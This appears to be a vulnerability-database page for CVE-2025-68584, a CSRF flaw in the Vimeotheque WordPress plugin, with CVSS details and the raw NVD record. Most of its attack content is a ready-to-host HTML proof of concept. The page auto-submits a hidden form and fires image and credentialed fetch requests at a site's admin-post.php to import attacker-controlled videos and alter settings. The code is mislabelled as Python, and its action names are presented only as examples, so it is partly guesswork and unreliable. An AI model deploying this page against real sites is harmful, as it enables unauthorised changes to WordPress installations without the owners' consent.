Security Vulnerability Report
中文
CVE-2025-68584 CVSS 4.3 MEDIUM

CVE-2025-68584

Published: 2025-12-24 13:16:26
Last Modified: 2026-04-27 19:16:34

Description

Cross-Site Request Forgery (CSRF) vulnerability in Constantin Boiangiu Vimeotheque codeflavors-vimeo-video-post-lite allows Cross Site Request Forgery.This issue affects Vimeotheque: from n/a through <= 2.3.5.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vimeotheque (codeflavors-vimeo-video-post-lite) <= 2.3.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-68584 - Vimeotheque Plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - Vimeotheque</title> </head> <body> <h2>CSRF PoC for CVE-2025-68584</h2> <p>Vimeotheque Plugin <= 2.3.5.2 CSRF Vulnerability</p> <!-- Auto-submit form to trigger malicious action --> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-post.php" method="POST" style="display:none;"> <!-- Plugin action endpoint - example for video import --> <input type="hidden" name="action" value="vimeotheque_import"> <input type="hidden" name="_wpnonce" value=""> <input type="hidden" name="video_url" value="https://vimeo.com/attacker_controlled_video"> <input type="hidden" name="post_status" value="publish"> <input type="hidden" name="category" value="malicious_category"> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { document.getElementById('csrfForm').submit(); }); </script> <!-- Alternative: Image-based CSRF trigger --> <img src="http://target-site.com/wp-admin/admin-post.php?action=vimeotheque_settings&setting=malicious_value" width="0" height="0" border="0"> <!-- Alternative: Fetch-based CSRF trigger --> <script> fetch('http://target-site.com/wp-admin/admin-post.php', { method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/x-www-form-urlencoded'}, body: 'action=vimeotheque_import&video_url=https://vimeo.com/attacker_controlled_video' }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68584", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:25.620", "lastModified": "2026-04-27T19:16:33.803", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Constantin Boiangiu Vimeotheque codeflavors-vimeo-video-post-lite allows Cross Site Request Forgery.This issue affects Vimeotheque: from n/a through <= 2.3.5.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/codeflavors-vimeo-video-post-lite/vulnerability/wordpress-vimeotheque-plugin-2-3-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}